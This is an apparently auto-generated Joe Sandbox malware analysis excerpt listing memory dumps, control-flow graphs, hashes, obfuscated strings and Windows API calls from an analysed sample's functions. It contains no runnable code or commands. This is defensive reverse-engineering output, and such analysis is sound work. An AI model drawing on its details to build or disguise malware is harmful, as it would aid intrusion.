                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                    • API String ID: 0-510280711
                                                                                                                                                                                                                                    • Opcode ID: 00e7c39bdcfb55b928fca35bfb2557bb999900485cb420ce492364d2d0b3f22d
                                                                                                                                                                                                                                    • Instruction ID: e8d45d48c5235bbcbcdf93aa5ed233e39d36341181a56c422dd0491f256c863f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00e7c39bdcfb55b928fca35bfb2557bb999900485cb420ce492364d2d0b3f22d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABC267B56083408FD7208F28C8927AFB7E1FF95315F59893CE8D98B292E7349945CB46
                                                                                                                                                                                                                                    Function 00C61D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 369 c61d00-c61d48 call c81320 372 c61d4e-c61db8 call c54c70 call c7c540 369->372 373 c62449-c62459 369->373 378 c61dba-c61dbd 372->378 379 c61dd6-c61dda 378->379 380 c61dbf-c61dd4 378->380 381 c61ddc-c61de7 379->381 380->378 382 c61dee-c61e05 381->382 383 c61de9 381->383 385 c61e07-c61e95 382->385 386 c61e0c-c61e17 382->386 384 c61ea8-c61eab 383->384 390 c61eaf-c61eb4 384->390 391 c61ead 384->391 388 c61e97-c61e9c 385->388 386->388 389 c61e19-c61e89 call c7e110 386->389 393 c61ea0-c61ea3 388->393 394 c61e9e 388->394 399 c61e8e-c61e93 389->399 395 c62392-c623c7 call c7c570 390->395 396 c61eba-c61eca 390->396 391->390 393->381 394->384 404 c623c9-c623cc 395->404 397 c61ecc-c61ee9 396->397 400 c61eef-c61f13 397->400 401 c6207b-c62083 397->401 399->388 403 c61f17-c61f1a 400->403 405 c62085-c62088 401->405 406 c61f33-c61f4d call c62460 403->406 407 c61f1c-c61f31 403->407 408 c623e5-c623eb 404->408 409 c623ce-c623e3 404->409 410 c62090-c620a1 call c7c540 405->410 411 c6208a-c6208e 405->411 406->401 423 c61f53-c61f7c 406->423 407->403 413 c623ed-c623f3 408->413 409->404 429 c620a3-c620ac 410->429 430 c620b1-c620b3 410->430 414 c620b5-c620b7 411->414 419 c623f7-c62409 413->419 420 c623f5 413->420 416 c620bd-c620e0 414->416 417 c62358-c62363 414->417 422 c620e2-c620e5 416->422 424 c62367-c6236f 417->424 425 c62365-c62375 417->425 427 c6240d-c62413 419->427 428 c6240b 419->428 426 c62447 420->426 432 c620e7-c62118 422->432 433 c6211a-c62157 422->433 434 c61f7e-c61f81 423->434 436 c62377 424->436 425->436 426->373 437 c6243b-c6243e 427->437 438 c62415-c62437 call c7e110 427->438 428->437 431 c62379-c6237d 429->431 430->414 431->397 444 c62383-c62388 431->444 432->422 441 c6215b-c6215e 433->441 442 c61f83-c61fac 434->442 443 c61fae-c61fc5 call c62460 434->443 436->431 439 c62442-c62445 437->439 440 c62440 437->440 438->437 439->413 440->426 446 c62177-c6217f 441->446 447 c62160-c62175 441->447 442->434 458 c61fc7-c61fcf 443->458 459 c61fd4-c61feb 443->459 451 c6238e-c62390 444->451 452 c6245a 444->452 453 c62181-c6218c 446->453 447->441 451->395 456 c62193-c621aa 453->456 457 c6218e 453->457 461 c621b1-c621be 456->461 462 c621ac-c62246 456->462 460 c62259-c62260 457->460 458->405 463 c61fef-c62079 call c47f50 call c548c0 call c47f60 459->463 464 c61fed 459->464 466 c62266-c62289 460->466 467 c62262 460->467 469 c621c4-c6223a call c7e110 461->469 470 c62248-c6224d 461->470 462->470 463->405 464->463 474 c6228b-c6228e 466->474 467->466 476 c6223f-c62244 469->476 472 c62251-c62254 470->472 473 c6224f 470->473 472->453 473->460 478 c62290-c622eb 474->478 479 c622ed-c62301 474->479 476->470 478->474 481 c62333-c62336 479->481 482 c62303-c62307 479->482 483 c62347-c62349 481->483 484 c62338-c62345 call c7c570 481->484 485 c62309-c62310 482->485 487 c6234b-c6234e 483->487 484->487 489 c62312-c6231e 485->489 490 c62320-c62323 485->490 487->417 492 c62350-c62356 487->492 489->485 494 c62325 490->494 495 c6232b-c62331 490->495 492->431 494->495 495->481
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                    • API String ID: 0-1565257739
                                                                                                                                                                                                                                    • Opcode ID: c6e7dc6c803628b3693a14e4f06b6e60d1193b2c784333091e3953fcf347bcfe
                                                                                                                                                                                                                                    • Instruction ID: 2ff38c781c0ccd25d10f7157443096d54074d9848f82b00abe23cb520567b818
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6e7dc6c803628b3693a14e4f06b6e60d1193b2c784333091e3953fcf347bcfe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E522AF7150CB808FD3248F29C48536FBBE1AB86314F18896EE5E987392D77AC945DB43
                                                                                                                                                                                                                                    Function 00C79280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 497 c79280-c792a4 498 c792b0-c792d7 497->498 498->498 499 c792d9-c792ef 498->499 500 c792f0-c79322 499->500 500->500 501 c79324-c7936a 500->501 502 c79370-c7938c 501->502 502->502 503 c7938e-c793a7 502->503 505 c793ad-c793b6 503->505 506 c7942a-c79435 503->506 507 c793c0-c793d9 505->507 508 c79440-c7947b 506->508 507->507 509 c793db-c793ee 507->509 508->508 510 c7947d-c794de 508->510 511 c793f0-c7941e 509->511 514 c79906-c79932 call c7fe00 GetVolumeInformationW 510->514 515 c794e4-c79515 510->515 511->511 512 c79420-c79425 511->512 512->506 520 c79934-c79938 514->520 521 c7993c-c7993e 514->521 517 c79520-c7954d 515->517 517->517 519 c7954f-c79576 SysAllocString 517->519 526 c798f5-c79902 519->526 527 c7957c-c79596 CoSetProxyBlanket 519->527 520->521 523 c79950-c79957 521->523 524 c79970-c7998f 523->524 525 c79959-c79960 523->525 531 c79990-c799b2 524->531 525->524 530 c79962-c7996e 525->530 526->514 528 c7959c-c795b4 527->528 529 c798eb-c798f1 527->529 532 c795c0-c7961e 528->532 529->526 530->524 531->531 533 c799b4-c799ca 531->533 532->532 535 c79620-c7969f 532->535 536 c799d0-c79a06 533->536 540 c796a0-c796ff 535->540 536->536 537 c79a08-c79a2e call c5e960 536->537 543 c79a30-c79a37 537->543 540->540 542 c79701-c7972d 540->542 552 c798d6-c798e7 SysFreeString * 2 542->552 553 c79733-c79755 542->553 543->543 544 c79a39-c79a4c 543->544 546 c79a52-c79a65 call c47fd0 544->546 547 c79940-c7994a 544->547 546->547 547->523 548 c79a6a-c79a71 547->548 552->529 555 c798cc-c798d2 553->555 556 c7975b-c7975e 553->556 555->552 556->555 557 c79764-c79769 556->557 557->555 558 c7976f-c797b7 557->558 560 c797c0-c797d4 558->560 560->560 561 c797d6-c797e0 560->561 562 c797e4-c797e6 561->562 563 c797ec-c797f2 562->563 564 c798bb-c798c8 562->564 563->564 565 c797f8-c79806 563->565 564->555 566 c7983d 565->566 567 c79808-c7980d 565->567 569 c7983f-c79877 call c47f50 call c48e10 566->569 570 c7981c-c79820 567->570 581 c798a7-c798b7 call c47f60 569->581 582 c79879-c7988f 569->582 572 c79822-c7982b 570->572 573 c79810 570->573 576 c79832-c79836 572->576 577 c7982d-c79830 572->577 575 c79811-c7981a 573->575 575->569 575->570 576->575 578 c79838-c7983b 576->578 577->575 578->575 581->564 582->581 583 c79891-c7989e 582->583 583->581 585 c798a0-c798a3 583->585 585->581
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00001F7A), ref: 00C79551
                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C7958F
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00C798DF
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00C798E5
                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 00C7992E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                    • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                    • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                    • Opcode ID: 60cb9665a88011231d49cfe247d71dd2a8ef6093107ee8e6a00c700aaf0fa6ec
                                                                                                                                                                                                                                    • Instruction ID: 8a5da3e73508a8e6eccc1681e8ba1617d5dd1da5d70ecf42dde16cc26836b43f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60cb9665a88011231d49cfe247d71dd2a8ef6093107ee8e6a00c700aaf0fa6ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36220376A183519BE310CF24C881B5BBBE2EFC5314F18C92CE5989B3A1D775D945CB82
                                                                                                                                                                                                                                    Function 00C4B100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 587 c4b100-c4b18b 588 c4b190-c4b199 587->588 588->588 589 c4b19b-c4b1ae 588->589 591 c4b414-c4b4b7 call c47e30 589->591 592 c4b4e4-c4b4ef 589->592 593 c4b1b5-c4b1b7 589->593 594 c4b4f6-c4b4fd 589->594 595 c4b1bc-c4b3db 589->595 596 c4b4be-c4b4c7 589->596 597 c4b52f-c4b538 589->597 598 c4b40b-c4b40f 589->598 591->592 591->594 591->596 591->597 604 c4b647-c4b657 591->604 605 c4b780 591->605 606 c4b782 591->606 607 c4b5e3-c4b5f0 591->607 608 c4b623-c4b640 591->608 609 c4b76f 591->609 610 c4b66f-c4b687 call c7fe00 591->610 611 c4b748-c4b76d 591->611 612 c4b789 591->612 613 c4b689-c4b697 591->613 614 c4b717-c4b732 call c7e0a0 591->614 615 c4b5f7-c4b60e call c7fe00 591->615 616 c4b6f0-c4b6f1 591->616 617 c4b610-c4b61e 591->617 618 c4b792-c4b79a 591->618 619 c4b69c-c4b6b1 591->619 620 c4b65e-c4b668 591->620 621 c4b6fe-c4b710 591->621 622 c4b79f 591->622 592->594 592->597 592->604 592->605 592->606 592->607 592->608 592->609 592->610 592->611 592->612 592->613 592->614 592->615 592->616 592->617 592->618 592->619 592->620 592->621 592->622 624 c4b6df-c4b6e6 593->624 623 c4b572-c4b592 594->623 625 c4b3e0-c4b3eb 595->625 602 c4b4ce-c4b4df 596->602 603 c4b4ff-c4b52a call c7fe00 596->603 599 c4b540-c4b56a 597->599 600 c4b6d3-c4b6dc 598->600 599->599 626 c4b56c-c4b56f 599->626 600->624 636 c4b6c6-c4b6d0 602->636 603->636 604->605 604->606 604->609 604->610 604->611 604->612 604->613 604->614 604->615 604->616 604->617 604->618 604->619 604->620 604->621 604->622 606->612 607->615 607->617 608->604 608->605 608->606 608->609 608->610 608->611 608->612 608->613 608->614 608->615 608->616 608->617 608->618 608->619 608->620 608->621 608->622 634 c4b774-c4b77a 609->634 610->613 611->634 612->618 631 c4b7a2-c4b7a9 613->631 641 c4b737-c4b741 614->641 615->617 639 c4b6f8 616->639 629 c4b6ba-c4b6bd 617->629 618->616 619->629 620->610 620->613 620->615 620->617 621->605 621->606 621->609 621->610 621->611 621->612 621->613 621->614 621->615 621->617 621->622 622->631 627 c4b5a0-c4b5bd 623->627 625->625 633 c4b3ed-c4b3f8 625->633 626->623 627->627 638 c4b5bf-c4b5dc 627->638 629->636 631->629 649 c4b3fb-c4b404 633->649 634->605 636->600 638->604 638->605 638->606 638->607 638->608 638->609 638->610 638->611 638->612 638->613 638->614 638->615 638->616 638->617 638->618 638->619 638->620 638->621 638->622 639->621 641->605 641->606 641->609 641->610 641->611 641->612 641->613 641->615 641->617 641->622 649->591 649->592 649->594 649->596 649->597 649->598 649->604 649->605 649->606 649->607 649->608 649->609 649->610 649->611 649->612 649->613 649->614 649->615 649->616 649->617 649->618 649->619 649->620 649->621 649->622
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
